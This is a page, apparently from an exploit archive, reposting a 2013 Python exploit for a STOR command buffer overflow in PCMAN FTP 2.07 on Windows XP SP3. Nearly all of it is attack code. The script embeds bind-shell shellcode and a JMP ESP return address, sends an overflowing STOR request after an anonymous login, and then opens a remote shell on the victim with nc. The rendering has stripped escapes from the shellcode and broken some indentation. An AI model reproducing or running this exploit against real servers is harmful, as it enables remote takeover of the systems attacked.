Home / exploitsPDF  

PCMAN FTP 2.07 STOR Command buffer overflow

Posted on 20 August 2013

<pre>#!/usr/bin/python
  
# Exploit Title: PCMAN FTP 2.07 STOR Command - buffer overflow
# Date: 18 Agosto 2013
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
# Contact: polunchis@intrusionlabs.org
# Version: PCMAN FTP 2.07 STOR Command
# Tested on: Windows XP SP3, Spanish
# Thanks:To GOD for giving me wisdom
#     
# Description:
# A buffer overflow is triggered when a long STOR command is sent to the server continued of these  /../ parameters
  
import socket, sys, os, time
  
if len(sys.argv) != 3:
        print &quot;[*] Uso: %s &lt;Ip Victima&gt; &lt;Puerto&gt; 
&quot; % sys.argv[0]
        print &quot;[*] Exploit created by Polunchis&quot;
        print &quot;[*] https://www.intrusionlabs.org&quot;
        sys.exit(0)
target = sys.argv[1]
port = int(sys.argv[2])
  
#msfpayload windows/shell_bind_tcp LPORT=28876 R | msfencode -a x86 -b 'x00xffx0ax0dx20x40' -t c
shellcode = (
&quot;xdaxcfxb8xbaxb3x1exe7xd9x74x24xf4x5ax33xc9xb1&quot;
&quot;x56x31x42x18x83xc2x04x03x42xaex51xebx1bx26x1c&quot;
&quot;x14xe4xb6x7fx9cx01x87xadxfax42xb5x61x88x07x35&quot;
&quot;x09xdcxb3xcex7fxc9xb4x67x35x2fxfax78xfbxefx50&quot;
&quot;xbax9dx93xaaxeex7dxadx64xe3x7cxeax99x0bx2cxa3&quot;
&quot;xd6xb9xc1xc0xabx01xe3x06xa0x39x9bx23x77xcdx11&quot;
&quot;x2dxa8x7dx2dx65x50xf6x69x56x61xdbx69xaax28x50&quot;
&quot;x59x58xabxb0x93xa1x9dxfcx78x9cx11xf1x81xd8x96&quot;
&quot;xe9xf7x12xe5x94x0fxe1x97x42x85xf4x30x01x3dxdd&quot;
&quot;xc1xc6xd8x96xcexa3xafxf1xd2x32x63x8axefxbfx82&quot;
&quot;x5dx66xfbxa0x79x22x58xc8xd8x8ex0fxf5x3bx76xf0&quot;
&quot;x53x37x95xe5xe2x1axf2xcaxd8xa4x02x44x6axd6x30&quot;
&quot;xcbxc0x70x79x84xcex87x7exbfxb7x18x81x3fxc8x31&quot;
&quot;x46x6bx98x29x6fx13x73xaax90xc6xd4xfax3exb8x94&quot;
&quot;xaaxfex68x7dxa1xf0x57x9dxcaxdaxeex99x04x3exa3&quot;
&quot;x4dx65xc0x33x42xe0x26xd9x4axa5xf1x75xa9x92xc9&quot;
&quot;xe2xd2xf0x65xbbx44x4cx60x7bx6ax4dxa6x28xc7xe5&quot;
&quot;x21xbax0bx32x53xbdx01x12x1ax86xc2xe8x72x45x72&quot;
&quot;xecx5ex3dx17x7fx05xbdx5ex9cx92xeax37x52xebx7e&quot;
&quot;xaaxcdx45x9cx37x8bxaex24xecx68x30xa5x61xd4x16&quot;
&quot;xb5xbfxd5x12xe1x6fx80xccx5fxd6x7axbfx09x80xd1&quot;
&quot;x69xddx55x1axaax9bx59x77x5cx43xebx2ex19x7cxc4&quot;
&quot;xa6xadx05x38x57x51xdcxf8x67x18x7cxa8xefxc5x15&quot;
&quot;xe8x6dxf6xc0x2fx88x75xe0xcfx6fx65x81xcax34x21&quot;
&quot;x7axa7x25xc4x7cx14x45xcd&quot;
)
  
# 7C86467B   FFE4             JMP ESP
# JMP ESP KERNEL32.DLL
garbage= 'x41' * 2005
jmpesp= 'x7Bx46x86x7C'
fixstack= 'x83xc4x9c'
vulparameter= '/../'
nop='x90' *4
  
buffer = garbage + jmpesp + nop + fixstack + shellcode
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print &quot;[+] Connect to %s on port %d&quot; % (target,port)
try:
    s.connect((target,port))
        s.recv(1024)
    s.send('USER anonymous
')
    s.recv(1024)
    s.send('PASS polunchis
')
    s.recv(1024)
    s.send(&quot;STOR &quot; + vulparameter + buffer + &quot;
&quot;)
        print &quot;[+] Sending payload of size&quot;, len(buffer)
    s.close()
    print &quot;[+] Exploit Sent Successfully&quot;
    print &quot;[+] Waiting for 5 sec before spawning shell to &quot; + target + &quot;:28876
&quot;
    print &quot;
&quot;
    time.sleep(5)
    os.system (&quot;nc -n &quot; + target + &quot; 28876&quot;)
    print &quot;[-] Connection lost from &quot; + target + &quot;:28876 
&quot;
except:
    print &quot;[-] Could not connect to &quot; + target + &quot;:21
&quot;
        sys.exit(0)

</pre>

 

TOP

Malware :

Exploits :